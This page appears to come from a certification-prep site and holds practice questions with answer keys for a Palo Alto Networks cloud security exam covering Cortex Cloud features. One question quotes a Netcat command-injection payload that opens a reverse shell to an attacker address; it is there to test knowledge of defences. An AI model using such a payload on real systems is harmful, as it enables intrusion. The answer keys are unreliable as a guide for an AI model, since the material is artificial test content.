Palo Alto Networks Cloud Security Professional v1.0

Page:    1 / 4   
Exam contains 60 questions

What is the automated method for Cortex Cloud to organize both a report by cloud type and a compliance benchmark that contains critical compliance issues to track over a 30-day threshold?

  • A. Use the cloud security report for tracking issues.
  • B. Create an account group with policy rules.
  • C. Use cloud compliance endpoint tracking policy rules.
  • D. Generate an assessment report tracking criticals.


Answer : D

How can a user determine the number of applications affected by a specific vulnerability and whether or not an endpoint agent is installed?

  • A. By viewing the Top Risky Vulnerabilities widget and filtering for the CVE
  • B. Browsing to the host inventory and viewing the vulnerabilities under Host Insights
  • C. By creating an asset group and a Cloud Security Assessment report
  • D. By creating an endpoint group and saving it as an agent management report


Answer : B

Which action can cloud workload protection (CWP) prevent?

  • A. Unauthorized users logging into a cloud service provider (CSP) account
  • B. Taking a snapshot of a running Linux virtual machine (VM)
  • C. Creation of a new Linux virtual machine (VM) without predefined tags
  • D. Malware execution on a Linux virtual machine (VM)


Answer : D

A developer writes a serverless application to extract a field from a file in an S3 bucket. The Lambda function is assigned the S3FullAccess managed policy.

Refer to the scenario to answer this question:
The serverless function does not sanitize its inputs, and code is injected into it. This results in malware being downloaded by a backend API server which is supposed to receive the API key from the function.
Which two capabilities could the API server use to detect the malware? (Choose two.)

  • A. Cloud Security Posture Management (CSPM)
  • B. Attack surface
  • C. Cloud Detection and Response (CDR)
  • D. Agentless disk scanning


Answer : BC

What is a lightweight solution that provides runtime visibility into an OpenShift cluster?

  • A. Cortex XDR for Cloud
  • B. Data broker
  • C. Agentless disk scanning
  • D. Kubernetes Connector


Answer : D

Based on the image below, what are the potential attack tactics and techniques involved and indicators of compromise (IoCs) that suggest a privilege escalation attempt?

  • A. Tactics and techniques: collection, command-and-control (C2), and impact
    IoCs: collecting system artifacts using cat, and establishing a C2 channel using curl to access metadata service for identity and access management (IAM) credentials
  • B. Tactics and techniques: initial access, exfiltration, and lateral movement
    IoCs: logging keystrokes using bash scripts, exfiltrating data with curl, and moving laterally using sudo
  • C. Tactics and techniques: defense evasion, persistence, and execution
    IoCs: hiding malicious processes using bash scripts, creating persistence through cron jobs, and executing commands using curl
  • D. Tactics and techniques: privilege escalation, credential access, and discovery
    IoCs: using curl to access metadata service for identity and access management (IAM) credentials


Answer : D

A user notices new Amazon EKS cluster endpoints connected to the Cortex Cloud console and wants to review the Cortex XDR agent YAML file used during deployment.
Where will the user find the file?

  • A. Data Sources
  • B. Host Inventory
  • C. Installations
  • D. Host Firewalls


Answer : C

In which two instances is it appropriate to implement the Kubernetes Connector instead of the XDR Cloud agent? (Choose two.)

  • A. When advanced mapping of artifacts and admission control are required
  • B. When runtime prevention and blocking are critical to the environment
  • C. When resource constraints on the underlying machine are a concern
  • D. When advanced network telemetry and traffic ingestion are a concern


Answer : AC

A company intends to deploy an Amazon EKS cluster to migrate its current application to a containerized design pattern. The application resides on dedicated servers and is always online, and any amount of downtime will be costly. There is currently no security visibility into either environment.
Which strategy should be implemented to achieve the company’s goal?

  • A. Deploy Kubernetes Connectors on the current environment and the new environment for the transition.
  • B. Install the Cortex XDR pro agent on the current environment and schedule downtime to configure the agent for the new environment.
  • C. Install the Cortex XDR agent for cloud on the current environment, and schedule downtime to configure the agent for the new environment.
  • D. Ensure agentless scanning and visibility is scoped for both environments and maintained during the transition.


Answer : D

An Ubuntu web server running Apache and PHP is compromised with the following command injection payload using Netcat to establish a direct connection back to the attacker machine: http://192.168.45.190/vuln.php?cmd=nc -e /bin/bash 192.168.45.161 4444
Which endpoint protection module would have prevented a successful connection had the Cloud Detection and Response (CDR) agent been installed on the server?

  • A. Network packet inspection engine
  • B. Restricted execution – network location
  • C. Shellcode protection
  • D. Reverse shell protection


Answer : D

A DevSecOps team requires CVE visibility into developer code repositories, while the cloud security team requires CVE visibility into developer applications at runtime.
Which Cortex Cloud capability is unique to the cloud security team’s requirement?

  • A. Static application security testing (SAST)
  • B. Vulnerability management
  • C. Code to Cloud
  • D. Software composition analysis (SCA)


Answer : C

A developer writes a serverless application to extract a field from a file in an S3 bucket. The Lambda function is assigned the S3FullAccess managed policy.

Refer to the scenario to answer this question:
Which capability of Cortex Cloud will detect the API key?

  • A. Agentless disk scanning secrets detection
  • B. Application security secrets detection
  • C. CI/CD posture management
  • D. Data Security Posture Management (DSPM)


Answer : B

A developer writes a serverless application to extract a field from a file in an S3 bucket. The Lambda function is assigned the S3FullAccess managed policy.

Refer to the scenario to answer this question:
Assuming that a fix is available for the vulnerable requests library declared in the requirements.txt file, how would a user remediate this vulnerability from Cortex Cloud?

  • A. Click on the vulnerability issue, then the Actions tab, then issue a pull request.
  • B. Click “Accept suggested changes” under the code shown in Known Usage.
  • C. Click into the serverless function inventory, open the asset, then create a pull request.
  • D. Click on the vulnerability issue, then the Actions tab, then issue a push request.


Answer : A

A company wants to centralize security findings from third-party security tools to prioritize remediation efforts.
Which two Application Security Posture Management (ASPM) features will achieve this integration and prioritization? (Choose two.)

  • A. Data encryption
  • B. Data Security Posture Management (DSPM)
  • C. Third-party ingestion
  • D. Contextual risk prioritization


Answer : CD

How does Cortex Cloud identify the risk of malicious code injection into a build pipeline?

  • A. By generating an alert showing which CI/CD pipeline is misconfigured and vulnerable to a poisoned pipeline execution (PPE)
  • B. By generating an alert on git committers demonstrating unusual activity patterns in the version control system (VCS)
  • C. By automatically detecting the issue and running a playbook through integrations with security orchestration, automation, and response (SOAR) tooling
  • D. By providing a real-time agent in the pipeline to block any activity outside an access list


Answer : A

Page:    1 / 4   
Exam contains 60 questions

Talk to us!


Have any questions or issues ? Please dont hesitate to contact us

Certlibrary.com is owned by MBS Tech Limited: Room 1905 Nam Wo Hong Building, 148 Wing Lok Street, Sheung Wan, Hong Kong. Company registration number: 2310926
Certlibrary doesn't offer Real Microsoft Exam Questions. Certlibrary Materials do not contain actual questions and answers from Cisco's Certification Exams.
CFA Institute does not endorse, promote or warrant the accuracy or quality of Certlibrary. CFA® and Chartered Financial Analyst® are registered trademarks owned by CFA Institute.
Terms & Conditions | Privacy Policy | Amazon Exams | Cisco Exams | CompTIA Exams | Databricks Exams | Fortinet Exams | Google Exams | Microsoft Exams | VMware Exams